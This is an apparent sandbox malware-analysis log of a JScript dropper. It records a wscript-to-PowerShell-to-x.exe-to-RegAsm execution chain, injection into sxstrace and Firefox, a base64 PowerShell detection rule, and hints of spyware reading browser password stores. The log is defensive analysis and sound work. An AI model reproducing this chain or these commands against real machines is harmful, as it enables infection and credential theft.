                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_05503C557_2_05503C55
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_05503C597_2_05503C59
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_0550E1097_2_0550E109
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_054FA1207_2_054FA120
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_055248197_2_05524819
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_055058F97_2_055058F9
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_0550C3147_2_0550C314
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_0550C3197_2_0550C319
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_05505B197_2_05505B19
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_05503B097_2_05503B09
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046624468_2_04662446
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045A14608_2_045A1460
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466F43F8_2_0466F43F
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0465E4F68_2_0465E4F6
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046675718_2_04667571
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B750D8_2_045B750D
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B05358_2_045B0535
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0464D5B08_2_0464D5B0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046705918_2_04670591
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046616CC8_2_046616CC
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045CC6E08_2_045CC6E0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045D47508_2_045D4750
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B07708_2_045B0770
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045AC7C08_2_045AC7C0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466F7B08_2_0466F7B0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466F0E08_2_0466F0E0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046670E98_2_046670E9
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B70C08_2_045B70C0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0465F0CC8_2_0465F0CC
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0467B16B8_2_0467B16B
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0459F1728_2_0459F172
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045E516C8_2_045E516C
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046381588_2_04638158
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045A01008_2_045A0100
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0464A1188_2_0464A118
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046681CC8_2_046681CC
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046701AA8_2_046701AA
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045BB1B08_2_045BB1B0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046502748_2_04650274
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046512ED8_2_046512ED
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045CB2C08_2_045CB2C0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046302C08_2_046302C0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045CD2F08_2_045CD2F0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B52A08_2_045B52A0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0459D34C8_2_0459D34C
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466A3528_2_0466A352
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466132D8_2_0466132D
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_046703E68_2_046703E6
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045BE3F08_2_045BE3F0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045F739A8_2_045F739A
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04629C328_2_04629C32
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B0C008_2_045B0C00
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466FCF28_2_0466FCF2
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045A0CF28_2_045A0CF2
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04650CB58_2_04650CB5
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04667D738_2_04667D73
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B3D408_2_045B3D40
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04661D5A8_2_04661D5A
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045BAD008_2_045BAD00
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045CFDC08_2_045CFDC0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045AADE08_2_045AADE0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045C8DBF8_2_045C8DBF
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B0E598_2_045B0E59
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466EE268_2_0466EE26
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466EEDB8_2_0466EEDB
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045C2E908_2_045C2E90
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B9EB08_2_045B9EB0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466CE938_2_0466CE93
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04624F408_2_04624F40
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045D0F308_2_045D0F30
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466FF098_2_0466FF09
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045F2F288_2_045F2F28
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04573FD58_2_04573FD5
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04573FD28_2_04573FD2
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045A2FC88_2_045A2FC8
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0462EFA08_2_0462EFA0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B1F928_2_045B1F92
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466FFB18_2_0466FFB1
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B28408_2_045B2840
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045BA8408_2_045BA840
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0461D8008_2_0461D800
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045DE8F08_2_045DE8F0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B38E08_2_045B38E0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045968B88_2_045968B8
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B99508_2_045B9950
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045CB9508_2_045CB950
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045C69628_2_045C6962
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0467A9A68_2_0467A9A6
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045B29A08_2_045B29A0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04623A6C8_2_04623A6C
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04667A468_2_04667A46
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466FA498_2_0466FA49
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0465DAC68_2_0465DAC6
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0464DAAC8_2_0464DAAC
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045AEA808_2_045AEA80
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045F5AA08_2_045F5AA0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466FB768_2_0466FB76
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0466AB408_2_0466AB40
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04625BF08_2_04625BF0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045EDBF98_2_045EDBF9
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_04666BD78_2_04666BD7
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_045CFB808_2_045CFB80
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004F1CC08_2_004F1CC0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004F53608_2_004F5360
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004E13778_2_004E1377
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004F356B8_2_004F356B
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004F35708_2_004F3570
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0050BA708_2_0050BA70
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004ECB508_2_004ECB50
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004EAD608_2_004EAD60
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004ECD708_2_004ECD70
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004EAEAC8_2_004EAEAC
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_004EAEB08_2_004EAEB0
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0431E71C8_2_0431E71C
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0431D7E88_2_0431D7E8
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0431E2688_2_0431E268
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0431E3838_2_0431E383
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: 8_2_0431CAA88_2_0431CAA8
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055F570812_2_055F5708
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055DEFF812_2_055DEFF8
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055D67E812_2_055D67E8
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055DB95812_2_055DB958
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055D49F812_2_055D49F8
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055CB00F12_2_055CB00F
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055D4B4812_2_055D4B48
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055D4B4412_2_055D4B44
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055DD20812_2_055DD208
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055D6A0812_2_055D6A08
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 12_2_055DD20312_2_055DD203
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: String function: 0461EA12 appears 86 times
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: String function: 045F7E54 appears 93 times
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: String function: 0459B970 appears 254 times
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: String function: 0462F290 appears 103 times
                Source: C:\Windows\SysWOW64\sxstrace.exeCode function: String function: 045E5130 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 026F5130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 026AB970 appears 262 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02707E54 appears 99 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0273F290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0272EA12 appears 86 times
                Source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: x.exe.1.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.powershell.exe.2409068bb78.0.raw.unpack, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                Source: RegAsm.exe, 00000006.00000002.1855652886.0000000000950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n_ip_tcpBS;.VBpp
                Source: RegAsm.exe, 00000006.00000002.1855652886.0000000000950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BS;.VBp
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJSE@16/8@11/6
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\p53ou1[1].ps1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
                Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\dddddd.ps1Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: sxstrace.exe, 00000008.00000002.2893591129.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.2039691076.00000000008D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeProcess created: C:\Windows\SysWOW64\sxstrace.exe "C:\Windows\SysWOW64\sxstrace.exe"
                Source: C:\Windows\SysWOW64\sxstrace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeProcess created: C:\Windows\SysWOW64\sxstrace.exe "C:\Windows\SysWOW64\sxstrace.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
